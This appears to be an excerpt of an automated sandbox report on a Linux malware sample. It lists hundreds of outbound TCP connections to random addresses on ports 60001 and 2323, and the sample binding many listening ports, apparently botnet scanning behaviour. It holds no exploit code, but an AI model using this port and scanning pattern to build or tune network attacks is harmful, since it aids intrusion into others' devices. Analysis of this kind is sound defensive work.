      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 4.148.162.97:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 77.188.254.119:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 112.220.131.23:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 110.29.29.210:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 116.147.108.221:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 159.236.239.21:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 211.195.123.25:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 18.249.236.218:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 58.4.23.157:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 65.187.69.75:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 119.214.118.235:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 65.123.180.81:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 95.78.215.32:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 179.213.218.196:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 64.126.250.50:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 147.50.105.199:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 164.150.65.9:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 148.228.161.126:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 27.32.215.162:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 37.239.204.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 161.97.43.225:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 77.199.215.196:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 150.63.199.109:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 168.11.12.155:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 149.239.3.53:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 182.122.76.94:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 38.99.67.158:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 14.105.4.244:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 57.39.96.119:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 1.236.246.150:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 81.172.155.157:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 77.9.31.137:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 92.1.100.128:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 60.160.51.232:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 12.192.24.250:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 99.239.205.161:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.167.240.117:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 45.165.130.46:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 208.183.190.59:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 118.3.15.34:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 118.76.230.19:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 120.150.86.59:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 92.128.222.131:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 84.23.158.57:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 110.173.198.67:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 137.208.232.105:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 84.150.200.172:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 199.136.13.179:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 108.150.216.100:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 93.14.187.75:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 5.106.109.43:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 76.127.175.96:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 60.254.105.222:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 219.56.255.156:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 171.46.46.28:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 110.219.32.141:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 31.231.15.33:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 93.28.50.2:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 140.78.95.20:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 107.153.231.196:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 60.24.78.21:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.200.207.46:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.180.79.162:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.111.12.24:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 60.34.43.70:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 53.22.98.60:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 51.63.48.60:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 169.158.93.32:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 8.36.37.247:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 178.181.134.183:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 173.191.102.88:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 51.78.233.122:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 143.153.186.112:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 180.71.213.178:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 104.100.153.152:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 105.231.231.214:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 133.40.139.148:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 44.208.86.201:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 2.169.154.85:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 24.24.142.230:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 110.14.41.34:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 128.183.232.18:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 222.243.57.28:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 50.35.92.190:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 159.119.27.15:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 4.138.147.184:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 147.20.20.62:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 206.106.147.75:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 1.125.161.6:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 71.223.181.97:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.135.9.235:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 96.121.143.16:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 112.38.250.166:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 217.23.74.37:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 27.247.87.246:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 53.250.224.179:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 121.148.171.28:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 209.145.9.96:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 132.94.65.114:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 222.221.90.99:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 32.189.16.77:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 95.244.217.176:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 17.33.171.160:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 175.154.155.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 187.78.2.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 44.202.126.27:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 31.195.99.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 24.112.230.50:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 153.6.46.129:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 160.70.14.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 218.20.41.147:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.68.140.241:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 71.19.118.155:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 80.222.43.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 76.21.205.89:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 4.80.241.43:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 63.131.116.62:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 13.198.161.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 14.155.190.102:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 141.108.176.198:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 69.9.26.68:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 112.196.155.113:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 159.234.98.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 164.147.247.207:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 108.255.43.4:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 135.213.173.20:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 210.202.218.117:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 41.46.37.106:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 64.228.89.41:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 179.90.249.17:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 199.3.41.177:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 79.53.105.84:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 160.153.139.124:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.214.6.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 50.239.238.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 5.241.214.110:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 43.247.65.145:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 99.17.183.125:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 128.218.220.169:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 143.197.76.38:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 25.29.15.215:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 71.187.126.42:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.41.6.181:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.186.199.196:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 200.206.13.243:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 109.131.36.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 209.154.225.119:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 61.216.116.169:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 203.188.120.3:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 40.232.237.164:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 100.235.237.190:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 187.120.15.101:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 173.46.251.96:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 32.167.229.147:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 170.164.55.195:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.29.52.121:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 31.135.128.196:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.55.18.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 20.195.149.141:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 105.124.39.148:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 158.218.110.103:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 14.210.145.229:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 211.221.92.177:60001
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 23.67.190.152:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 125.246.65.242:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 83.205.81.248:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 167.165.177.98:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 31.141.132.247:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 125.121.0.237:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 132.234.2.150:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 141.178.238.177:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 203.98.221.137:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 73.142.96.208:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 159.28.12.71:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 48.193.25.197:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 35.57.21.190:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 99.252.13.187:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 66.129.239.80:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 104.202.221.102:2323
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 77.38.175.50:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 156.66.213.74:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.58.252.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 51.137.108.86:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 107.221.21.232:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.247.207.73:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 167.134.185.30:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 223.137.246.203:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 78.58.51.89:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 71.93.105.85:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 140.157.228.235:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 140.135.133.43:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 137.207.119.198:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 86.243.116.171:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 209.105.176.97:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 107.184.165.49:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 90.163.46.26:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 139.213.177.93:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 213.179.150.216:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 20.40.223.54:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 88.254.93.247:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 20.124.5.40:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 57.123.110.60:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 191.7.49.149:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 204.64.24.113:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 139.13.74.206:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 104.238.86.213:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 182.137.224.126:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 211.104.26.249:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 186.73.137.91:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 95.132.15.65:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 206.113.249.157:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 101.221.204.12:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 198.36.53.24:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 182.63.45.190:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 4.160.21.251:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 31.86.128.3:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 167.147.108.208:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 93.136.97.32:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 80.136.152.110:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 5.184.15.32:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 99.249.189.191:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 177.253.251.99:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 187.64.88.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.171.230.234:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 193.98.45.150:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 82.121.57.163:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 217.120.150.11:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 65.12.82.99:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 76.210.165.73:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 77.239.139.110:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 52.179.164.93:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 102.58.179.252:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 142.74.243.78:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 62.252.156.38:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 96.10.130.133:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 166.208.236.225:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.134.96.46:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 87.127.214.48:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 223.143.13.216:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 12.124.154.198:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 185.77.127.138:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 121.245.72.172:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 61.201.118.55:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 179.149.154.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.182.75.240:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.97.128.205:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 142.53.154.192:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 96.227.22.89:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 108.91.13.82:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 188.224.212.234:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.106.24.29:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 44.226.36.193:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 98.65.173.182:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 138.28.144.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 35.141.50.8:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 63.215.206.249:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 185.187.51.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 138.133.34.70:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.204.60.11:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.1.231.123:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 109.166.193.173:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 5.40.15.57:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 208.115.230.227:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 79.46.235.48:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 152.9.42.191:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 202.176.18.228:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 89.20.94.182:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.93.88.189:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 114.118.71.45:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 88.39.119.212:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 13.131.10.218:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 196.166.233.190:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 178.8.98.45:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 53.144.74.55:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 189.207.112.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 14.148.169.200:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 64.228.107.8:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 223.206.138.142:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 124.72.192.165:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 31.78.105.134:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 205.158.34.228:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 164.129.194.221:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 145.245.200.76:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 91.161.82.136:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 141.169.84.124:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 138.249.178.193:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 12.131.72.104:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 57.143.159.209:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 88.251.10.15:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 109.89.31.139:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 112.17.125.5:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 221.72.207.244:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 138.240.53.251:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 180.216.18.38:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 109.223.189.11:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 178.17.62.91:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 136.169.196.47:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 199.46.102.157:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.134.192.6:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 91.243.134.83:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 53.194.90.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 34.123.191.202:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 18.210.153.204:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 101.24.70.70:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 128.247.211.146:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 208.72.97.3:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 126.182.52.69:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 48.83.247.55:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 155.92.220.104:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 98.197.250.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 157.186.91.239:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 119.147.83.81:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 37.102.243.211:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 42.226.17.22:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 222.149.234.119:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 84.196.114.20:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 184.185.106.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 87.101.99.77:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.63.26.220:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 125.87.12.236:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 173.240.206.207:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 221.32.9.117:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 166.94.124.174:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 43.200.1.77:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 1.189.233.246:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 99.66.220.194:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 38.142.127.80:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 165.65.125.61:60001
      Source: /tmp/SLdtSSVlj2 (PID: 5267)Socket: 127.0.0.1::43829Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::0Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::8000Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::9000Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::8080Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::8081Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::53413Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::52869Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::37215Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::81Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::8089Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::8088Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::8083Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::443Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::4444Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::8001Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::49152Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::40960Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::1024Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::1337Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::420Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::23Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::0Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::80Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::60001Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::8000Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::9000Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::8080Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::8081Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::53413Jump to behavior
